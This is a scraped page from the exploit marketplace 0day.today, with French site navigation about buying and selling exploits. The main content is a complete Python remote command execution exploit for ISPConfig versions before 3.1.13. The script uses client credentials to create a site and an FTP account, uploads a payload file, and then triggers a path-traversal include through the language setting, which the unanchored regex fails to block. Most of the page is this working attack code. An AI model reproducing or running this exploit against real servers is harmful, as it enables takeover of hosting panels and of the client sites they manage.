0day.today - La plus grande base de données de Exploit dans le monde.
![](/img/logo_green.jpg)
Nous utilisons un domaine DOMAIN_LINK
Si vous voulez acheter un exploit ou payer un service vous avez besoins d'Or. Nous ne voulons pas que notre site soit utiliser comme outil de piratage , de sorte que touts types d'actions qui pourrais affecter illegalement d'autres utilisateurs ou sites web ou vous n'avez pas l'autorisation vous serez bannit et votre compte ainsi que vos donnees seront supprimees.
Les administrateur de 0day.today utilises des moyens de contacts officiels. Mefiez-vous des imposteurs!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Lire le [ J'accepte ]
- Lire le [ Envoyer ] Regles
- Visiter le [ faq ] page
- [ Enregistrement ] profil
- Obtenir [ GOLD ]
- Si vous voulez [ vendre ]
- Si vous voulez [ acheter ]
- Si vous vous perdez [ Compte ]
- Une questions [ [email protected] ]
- Connexion
- Page d'enregistrement
- Restauration de compte
- Foire aux questions
- Contactez-nous
- Regle de publication
- Page de contrat
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Vous pouvez nous contacter par:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ISPConfig < 3.1.13 Remote Command Execution Exploit
Auteur
Risque
![](/img/risk/critlow_4.gif)
Security Risk Critical
]0day-ID
Catégorie
Date d'ajout
Plateforme
# Title: ISPConfig < 3.1.13 - Remote Command Execution # Author: 0x09AL # Date: 20/08/2018 # Vendor: https://www.ispconfig.org/ # # Vulnerability Description # # There is an include on almost all the php files, which includes the language template. # For example: # In password_reset.php - Line 46 the following code tries to include the filename # that is specified in the $_SESSION['s']['language'] variable. # # include ISPC_ROOT_PATH.'/web/login/lib/lang/'.$_SESSION['s']['language'].'.lng'; # # Searching a little bit where the $_SESSION['s']['language'] variable is set we can find a reference in user_settings.php # if(preg_match('/[a-z]{2}/',$_POST['language'])) { # $_SESSION['s']['user']['language'] = $_POST['language']; # $_SESSION['s']['language'] = $_POST['language']; # } else { # $app->error('Invalid language.'); # } # # The regex checks if the language contains two lower-case characters. # The problem is that everything that contains two [a-z] characters will match the regex. # Developer probably missed the ^ $ on the regex to match the entire file. # # Since in the new versions of php we can not use null byte injections, either a path-truncation attack # we can create a ftp-account, upload the file we want to include with .lng extension at our path and the code # will get executed as the ispconfig account and not as our chroot-ed account. # # This exploit can be triggered by having clients credentias , and exploiting this vulnerability we can compromise # the entire clients. # # You need to specify the hostname:port , username, and password of the client. import requests import ftplib import json import time from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) host = "host:8080" username = "username" password = "password" exp = requests.session() user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0' ftp_username = "randomusr1" domain = "pwned.com" site_id = 1 payload_name = "pwned1" path = "" def login(): r = exp.post('https://%s/login/index.php' % host,data={'username':username,'password':password,'s_mod':'login','s_pg':'index'},verify=False) if(r.text.find("wrong")>0): print "[-] Incorrect credentials [-]" else: print "[+] Logged in Succesfully [+]" def createSite(): r = exp.get('https://%s/sites/web_vhost_domain_edit.php' % host,verify=False) _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0] _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0] phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0] r = exp.post('https://%s/sites/web_vhost_domain_edit.php' % host,data={'server_id':1,'ip_address':'*','ipv6_address':'','domain':'%s' % domain,'hd_quota':1024,'traffic_quota':1024,'subdomain':'www','php':'no','fastcgi_php_version':'','active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False) pass def createFtp(): global site_id r = exp.get('https://%s/sites/ftp_user_edit.php' % host,verify=False) print "[+] Getting IDSof the sites [+]" temp_array = r.text.split('<option value=') nr_sites = len(temp_array) print "[+] Number of sites %d [+]" % (int(nr_sites) - 1) # Find the latest created site by checking the ID. max_id = -9999 for i in range(1,nr_sites): temp = int(temp_array[i].split('>')[0].replace("'","")) if(temp > max_id): max_id = temp site_id = max_id print "[+] Newly created site id is : %d [+]" % site_id _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0] _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0] phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0] r = exp.post('https://%s/sites/ftp_user_edit.php' % host,data={'parent_domain_id':site_id,'username':'%s' % ftp_username,'password':'%s' % password,'repeat_password':'%s' % password,'quota_size':1024,'active':'y','id':'','_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False) print "[+] Created FTP Account [+]" pass def uploadPayload(): ftp = ftplib.FTP(host.split(":")[0]) ftp.login(username+ftp_username, password) ftp.cwd("web") ftp.storlines("STOR %s.lng" % payload_name,open("test.txt")) print "[+] Payload %s uploaded Succesfully [+]" % payload_name pass def waitTillCreation(): while 1: print "[+] Trying [+]" r = exp.get('https://%s/datalogstatus.php' % host,verify=False) temp = json.loads(r.text) if(temp["count"] == 0): print "[+] Everything created .... [+]" return time.sleep(5) def getRelativePath(): global path r = exp.get('https://%s/sites/web_vhost_domain_edit.php?id=%d&type=domain' % (host,site_id),verify=False) path = r.text.split('Document Root</label>')[1].split('<div class="col-sm-9">')[1].split('<')[0] path += "/web/" + payload_name print "[+] Uploading payload in %s [+]" % path def triggerVuln(): r = exp.get('https://%s/tools/user_settings.php' % host,verify=False) _csrf_key = r.text.split('name="_csrf_key" value="')[1].split('"')[0] _csrf_id = r.text.split('name="_csrf_id" value="')[1].split('"')[0] phpsessid = r.text.split('name="phpsessid" value="')[1].split('"')[0] user_id = r.text.split('name="id" value="')[1].split('"')[0] r = exp.post('https://%s/tools/user_settings.php' % host,data={'passwort':'','repeat_password':'','language':'../../../../../../../../../../../../../..%s' % path,'id':'%s' % user_id,'_csrf_id':'%s' % _csrf_id,'_csrf_key':'%s' % _csrf_key,'next_tab':'','phpsessid':'%s' % phpsessid},verify=False) r = exp.get('https://%s/index.php'% host,verify=False) print r.text login() createSite() createFtp() getRelativePath() waitTillCreation() uploadPayload() triggerVuln() # 0day.today [2024-07-02] #